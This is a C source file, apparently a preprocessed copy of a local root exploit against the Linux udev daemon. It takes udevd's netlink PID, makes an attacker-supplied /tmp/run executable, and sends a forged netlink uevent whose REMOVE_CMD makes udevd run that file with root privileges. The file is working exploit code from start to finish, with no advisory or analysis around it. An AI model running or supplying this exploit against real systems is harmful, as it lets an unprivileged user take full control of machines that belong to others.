
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;






struct stat {int dummy; } ;
struct sockaddr_nl {scalar_t__ nl_groups; int nl_pid; int nl_family; } ;
struct sockaddr {int dummy; } ;
struct msghdr {int msg_namelen; int msg_iovlen; struct iovec* msg_iov; void* msg_name; } ;
struct iovec {int iov_len; void* iov_base; } ;
typedef int address ;


 int AF_NETLINK ;
 int NETLINK_KOBJECT_UEVENT ;
 int SOCK_DGRAM ;
 int atoi (char*) ;
 int bind (int,struct sockaddr*,int) ;
 int close (int) ;
 int exit (int) ;
 int memset (struct sockaddr_nl*,int ,int) ;
 int printf (char*,char*) ;
 int sendmsg (int,struct msghdr*,int ) ;
 int socket (int ,int ,int ) ;
 scalar_t__ sprintf (char*,char*) ;
 int stat (char*,struct stat*) ;
 int system (char*) ;

int
main(int argc, char **argv)
{
 int sock;
 char *mp, *err;
 char message[4096];
 struct stat st;
 struct msghdr msg;
 struct iovec iovector;
 struct sockaddr_nl address;

 if (argc < 2) {
  err = "Pass the udevd netlink PID as an argument";
  printf("[-] Error: %s\n", err);
  exit(1);
 }

 if ((stat("/etc/udev/rules.d/95-udev-late.rules", &st) == -1) &&
     (stat("/lib/udev/rules.d/95-udev-late.rules", &st) == -1)) {
  err = "Required 95-udev-late.rules not found";
  printf("[-] Error: %s\n", err);
  exit(1);
 }

 if (stat("/tmp/run", &st) == -1) {
  err = "/tmp/run does not exist, please create it";
  printf("[-] Error: %s\n", err);
  exit(1);
 }
 system("chmod +x /tmp/run");

 memset(&address, 0, sizeof(address));
 address.nl_family = AF_NETLINK;
 address.nl_pid = atoi(argv[1]);
 address.nl_groups = 0;

 msg.msg_name = (void*)&address;
 msg.msg_namelen = sizeof(address);
 msg.msg_iov = &iovector;
 msg.msg_iovlen = 1;

 sock = socket(AF_NETLINK, SOCK_DGRAM, NETLINK_KOBJECT_UEVENT);
 bind(sock, (struct sockaddr *) &address, sizeof(address));

 mp = message;
 mp += sprintf(mp, "remove@/d") + 1;
 mp += sprintf(mp, "SUBSYSTEM=block") + 1;
 mp += sprintf(mp, "DEVPATH=/dev/foo") + 1;
 mp += sprintf(mp, "TIMEOUT=10") + 1;
 mp += sprintf(mp, "ACTION=remove") +1;
 mp += sprintf(mp, "REMOVE_CMD=/tmp/run") +1;

 iovector.iov_base = (void*)message;
 iovector.iov_len = (int)(mp-message);

 sendmsg(sock, &msg, 0);

 close(sock);

 return 0;
}
